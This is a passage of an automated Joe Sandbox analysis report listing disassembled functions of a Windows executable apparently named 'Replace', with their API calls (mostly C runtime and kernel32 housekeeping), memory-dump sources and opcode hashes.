                                                                                                                                                                                                                • Part of subcall function 00BC3DA3: EnterCriticalSection.KERNEL32(000000B0,00000000,?,00000000,00000000,00000000,00000000,00BC3F31,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 00BC3DBA
                                                                                                                                                                                                                • Part of subcall function 00BC3DA3: LeaveCriticalSection.KERNEL32(?,?,?), ref: 00BC3E5E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000000B0,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00BC43A5
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000000B0), ref: 00BC43E7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2116739831-0
                                                                                                                                                                                                              • Opcode ID: 0087f415a537c998ca6c46f7ccf7458fc7b60ca1b2dee9df7a6b65ddc889ab94
                                                                                                                                                                                                              • Instruction ID: 2eaa3bb16b7a2bbe31d955bfcfc19693e6ed1a5a77d63f7abc1dbd60ec2c1330
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0087f415a537c998ca6c46f7ccf7458fc7b60ca1b2dee9df7a6b65ddc889ab94
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8272F671A087429FC768CF69C590A2BFBE1FFC9704F14896EE99987210E770E945CB42
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD8A3D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BD8A38,?,?,00000008,?,?,00BD86D0,00000000), ref: 00BD8C6A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                              • Opcode ID: ed815a4a8463b310e3058bd46bd2d136134accede75e44835b6182db0e665f2c
                                                                                                                                                                                                              • Instruction ID: 37488911b7dd707bb267f74be8326a07aefe95b8d08dd0d9608bdecb1779b247
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed815a4a8463b310e3058bd46bd2d136134accede75e44835b6182db0e665f2c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB17F71210608DFD715CF28C486B65BBE1FF05366F29869AE89ACF3A1D735E981CB40
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC0378 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3732870572-0
                                                                                                                                                                                                              • Opcode ID: a1300af0e4da64ea7748f1ecc3bffc842d67cde7d8b6f76d00e2b2fe995aefbd
                                                                                                                                                                                                              • Instruction ID: 4988715e5505b93b805bccb5ea06809b352754464587723e05780ff74b44a90a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1300af0e4da64ea7748f1ecc3bffc842d67cde7d8b6f76d00e2b2fe995aefbd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5712771624741DBDB28EE25C490B2BB7E6FB98314F448A6EF596C7740EB70E8408F52
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BCCB2A Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001CB36,00BCC33A), ref: 00BCCB2F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                              • Opcode ID: 5500006653dd55f8810bc696a55b2248fd1c154b993903eda18225cd30497762
                                                                                                                                                                                                              • Instruction ID: edf17751572fb12c1e8cf92a0414af053f80827d7b3b6db29e54fc3c70aee6a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5500006653dd55f8810bc696a55b2248fd1c154b993903eda18225cd30497762
                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD4909 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                              • Opcode ID: 53bacc2d8469d518e6abb2138d12e9f0ce77391ec377b088f1d26dcd3342e848
                                                                                                                                                                                                              • Instruction ID: c324d0a6bc7943474b80df8b30cc9f4c0e864b2f3114f846bf96864d1da76e4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53bacc2d8469d518e6abb2138d12e9f0ce77391ec377b088f1d26dcd3342e848
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCA01270101100CB43108F315D4420976956D402C0701C0255001CA120EF2080505700
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BBA886 Relevance: .6, Instructions: 598COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: ac1281bbeea65f2b6bb775c61bcae327fdb296be42dfe688bd3c3b4869dffded
                                                                                                                                                                                                              • Instruction ID: d429a0b887247a32e9576b83c2036508c3796a7e81c7c0d0428b1ee34c292385
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac1281bbeea65f2b6bb775c61bcae327fdb296be42dfe688bd3c3b4869dffded
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98323C71900249DFCB55DF28C881AFDBBE5FF48300F1985A9E8599B252DBB0EC91CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC2B1F Relevance: .5, Instructions: 525COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 4272536b496d5360d8d10fdf1da608a5ede8097c83ee5e6d56a9a01ab42c1ee3
                                                                                                                                                                                                              • Instruction ID: 3052627eacd027a159bd483021e95651542c59b0c6655dc3425634b67aae5545
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4272536b496d5360d8d10fdf1da608a5ede8097c83ee5e6d56a9a01ab42c1ee3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B50290327043158FD708CF2DC980A6ABBE2ABC8744F554ABDF496DB290D630DA46CB55
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB9EDE Relevance: .5, Instructions: 451COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 46a73b7ab401534dcad57af5bb67378b429419085b78b06654a418b9e52df2b8
                                                                                                                                                                                                              • Instruction ID: 4bd7d115fc509eec7c290d7593fe4ab8088248fdba65b59f7827c8859cb93ff1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46a73b7ab401534dcad57af5bb67378b429419085b78b06654a418b9e52df2b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5026574E002169FCB14DF68C5909FDB7F6FF49310B1081A9E91AAB312DBB1AC01CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB1054 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7d1d98452d4e15de4c435841c218ce5782cfebf9cea2bbbd4bdeba8d300dfbe8
                                                                                                                                                                                                              • Instruction ID: 2be3dcf26cecbcf93ca8102b60f887db6348c23e0b99522a73f8469c699cceda
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d1d98452d4e15de4c435841c218ce5782cfebf9cea2bbbd4bdeba8d300dfbe8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 804135326142408BD718CE1CC9A47FE77D6E7C5320F954EBEE246A3554CAB48D84C792
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BBD7F1 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: bdfae7e78cc4344e88ec60d9e2ddd2f725764665496e2c425a25bc36bbe30783
                                                                                                                                                                                                              • Instruction ID: ad6cbe00aa7fb2ef403c10ea59b6436c4f4a7202b3181dd57dfce08ea1c2183e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdfae7e78cc4344e88ec60d9e2ddd2f725764665496e2c425a25bc36bbe30783
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A2195715206224BC316DE1DDC845B6F7D0FB89306F86826AEE819B285C769F829C7E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BBD75B Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d90cc63b55ef834e9be2b037506950026b519ddfc119c0db8de5c85cc2953256
                                                                                                                                                                                                              • Instruction ID: 8f453bff510d62e05629d52a9ce77f6d49cb36bdd15bab1ecf01560e85946cc6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d90cc63b55ef834e9be2b037506950026b519ddfc119c0db8de5c85cc2953256
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38112B71A105310BD71AD92F8C846F677D5EBC9315F8AC3A6DC819B688DA6CFC25C2E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC08B5 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 508c0c16835d7cd0af089b5ca690a3cc53402b89785868abd31ce742de31e14b
                                                                                                                                                                                                              • Instruction ID: 902af3c7580fde475d60e5982b60e3bcaca6cb1a9ad7c3c9723a3646290e7170
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 508c0c16835d7cd0af089b5ca690a3cc53402b89785868abd31ce742de31e14b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2F0A4B5E05219EF8B08CFADC48089EFBF5FF48214B1080AEE859E3350D730AA00CB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD26E3 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9178e3d3e202cc242b353f9f2b4307d72396d8a4188a379d4015bd546c8b6c8b
                                                                                                                                                                                                              • Instruction ID: b9cc5a72d47b4c950d97e6f2bc96e3b4a553e8e5ac0bdbf2e3205575c6921a4f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9178e3d3e202cc242b353f9f2b4307d72396d8a4188a379d4015bd546c8b6c8b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9E08C32911278EBCB28DB88CA0498AF3FCEB44B10B1500ABF501E3250D270DE04C7D0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD457F Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 00BD45C3
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD4155
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD4167
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD4179
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD418B
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD419D
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD41AF
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD41C1
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD41D3
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD41E5
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD41F7
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD4209
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD421B
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD422D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD45B8
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD45DA
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD45EF
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD45FA
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD461C
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD462F
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD463D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4648
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4680
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4687
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD46A4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD46BC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                              • Opcode ID: 5f70490e72530e73b2320b774cafa44797eae7745025dbd2ab47a980c8581119
                                                                                                                                                                                                              • Instruction ID: f0e9217ea5a4f02fa37416025d646fcef4b351f18418acac29a36d8cc5cc5789
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f70490e72530e73b2320b774cafa44797eae7745025dbd2ab47a980c8581119
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8315C31604601AFEB21AA78D985B96F7E8EF01310F1048EBE596D7391FF72EC808B14
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB4473 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 78librarystringloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?), ref: 00BB4499
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,SetDefaultDllDirectories), ref: 00BB44B9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00BB44C0
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000106), ref: 00BB44E2
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00BB44F7
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,.dll), ref: 00BB453E
